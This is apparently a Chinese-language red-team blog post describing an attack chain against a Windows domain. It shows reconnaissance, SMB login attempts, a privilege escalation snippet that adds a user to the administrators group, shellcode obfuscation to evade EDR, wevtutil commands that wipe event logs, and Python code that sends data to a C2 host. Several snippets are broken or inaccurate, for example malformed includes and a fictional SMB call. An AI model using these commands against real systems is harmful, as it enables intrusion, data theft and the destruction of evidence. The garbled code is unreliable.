一、攻击的序曲：防御思维的反攻

在我参与的多个红队演练中，Windows域环境常常是我们的重点目标。防御者非常清楚域控制器的重要性，因此他们会部署各种安全措施来保护它。想要攻破这样的目标，我们就需要从他们的防御策略中找到攻击的突破口。

一个典型的Windows域保护措施包括：限制特权账户的使用、启用审计日志、部署入侵检测系统（IDS）和使用基于行为的EDR。面对如此严密的防护，我常常会从那些平常被忽视的边缘入手，寻找脆弱点。

薄弱环节：账户权限滥用

账户权限是域环境的一个关键点。虽然域管理员账户受到严格保护，但普通用户账户通常管理不严。然而，许多域环境会错误地授予普通用户过高的权限，或者未能有效分配权限。这为攻击提供了契机。

信息收集：初步侦查

信息收集是攻击链中的重要一环。在一个渗透行动中，我曾通过一个低权限账户的入侵实现了对整个域环境的控制。通过识别域中的所有账户及其权限，我能确定哪些账户可以用来提升权限。

<pre><code class="language-shell"># 使用 PowerShell 列出域用户 Get-ADUser -Filter * -Property DisplayName,Enabled | Select-Object DisplayName,Enabled</code></pre>

这个命令可以帮助我们获得域中所有的用户列表，并判断哪些账户可能是潜在的攻击目标。

二、渗透的艺术：横向移动与权限提升

一旦我们掌握了域用户的信息，接下来就是利用这些信息进行横向移动和权限提升。我记得有一次，通过简单的信息泄露，我发现了一台有漏洞的服务器。通过这台服务器，我找到了一个可以进一步利用的账户。

横向移动：寻找跳板

在发现攻击跳板时，我通常会利用已知的漏洞或弱口令进行登录尝试。一旦登录成功，我就能直接执行命令，甚至有机会获取到更高的权限。

<pre><code class="language-python"># 使用 Python 进行 SMB 登录尝试 import smb conn = smb.SMBConnection(&#039;username&#039;, &#039;password&#039;, &#039;client_machine_name&#039;, &#039;server_name&#039;) conn.connect(&#039;192.168.0.10&#039;, 139)</code></pre>

这个脚本用于尝试通过SMB协议进行登录，如果成功，我们就可以在该机器上执行进一步的操作。

权限提升：从用户到管理员

权限提升是一个复杂的过程，通常需要结合多个漏洞和技术。在一次实战中，我结合了一个已知的本地提权漏洞CVE-2021-34527，成功将普通用户权限提升到了系统管理员权限。

<pre><code class="language-c">// 简单的C语言示例，展示如何利用一个本地提权漏洞

include &lt;stdio.h&gt;

include &lt;stdlib.h&gt;

void main() { // 运行特权命令，注意需要结合特定漏洞 system(&quot;net localgroup administrators user /add&quot;); }</code></pre>

三、绝对隐匿：免杀与痕迹清除

在攻破域环境的过程中，隐匿性是至关重要的。攻击再华丽，若被发现，也是徒劳。对我来说，免杀与对抗是必修课。

免杀策略：规避检测

为了绕过EDR的检测，我常使用恶意载荷混淆技术。通过自定义加壳和混淆，我能让恶意代码在不被检测的情况下执行。

<pre><code class="language-python"># 使用 Python 混淆Shellcode shellcode = b&quot;\xfc\x48\x83\xe4\xf0\xe8&quot; encoded = &quot;&quot; for byte in shellcode: encoded += &quot;\\x%02x&quot; % byte

print(encoded)</code></pre>

这种简单的混淆技术只有在结合其他技术时才会有效，但它是一个好的开始。

痕迹清除：消除所有记录

在一次行动结束后，我会确保清除所有的日志和痕迹，以免在后续调查中被发现。通过删除系统日志和使用工具覆盖文件，我能有效地隐藏我的行踪。

<pre><code class="language-shell"># 删除Windows事件日志 wevtutil cl System wevtutil cl Security wevtutil cl Application</code></pre>

这些命令可用于清理系统日志，为攻击后的撤离提供安全保障。

四、窃取数据：最终目标的实现

每次渗透的最终目标往往是数据窃取。在一次实战中，我成功获取了域控制器的所有敏感数据，并加密传输到远程服务器。

数据采集：收集关键情报

在域内获得高权限后，我会专注于挖掘有价值的数据。域控制器上的数据库和文件通常是首要目标。

安全传输：数据外泄

为了安全地传输数据，我使用了自定义的C2通道，以避免被流量监测工具检测到。

<pre><code class="language-python"># 使用 Python 实现简单的数据加密传输 import socket import ssl

server_address = (&#039;c2server.com&#039;, 443) sock = socket.create_connection(server_address) ssl_sock = ssl.wrap_socket(sock)

ssl_sock.sendall(b&quot;Sensitive data&quot;) ssl_sock.close()</code></pre>

五、个人心得：实战经验的沉淀

在多年的红队工作中，我深切体会到每一次渗透都是一场技术与心理的双重对抗。成功的关键在于对细节的掌控和对防御策略的深刻理解。

经验分享：实战技巧

1. 信息收集是关键：尽可能掌握更多的信息，为后续的渗透做好准备。
2. 隐匿性优先：即使技术再高，也要学会隐藏自己的足迹。
3. 灵活应对：每个域环境都有不同的防御措施，必须灵活变通。
4. 学习与积累：不断学习新的技术和漏洞，更新自己的攻击手段。

通过每一次的实战，我不仅提高了技术水平，也更加理解如何从攻击者的角度思考问题。希望这些经验能对从事红队工作的你有所帮助。